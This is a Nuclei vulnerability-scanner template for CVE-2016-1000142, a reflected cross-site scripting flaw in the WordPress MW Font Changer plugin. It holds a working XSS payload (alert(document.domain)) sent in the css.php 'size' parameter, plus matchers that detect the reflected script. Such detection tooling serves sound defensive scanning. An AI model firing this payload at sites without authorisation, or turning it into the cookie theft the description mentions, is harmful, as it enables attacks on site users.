nuclei-templates/cves/2016/CVE-2016-1000142.yaml

42 lines
1.4 KiB
YAML

id: CVE-2016-1000142
info:
name: WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- http://www.vapidlabs.com/wp/wp_advisory.php?v=435
- https://wordpress.org/plugins/parsi-font
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000142
cwe-id: CWE-79
tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12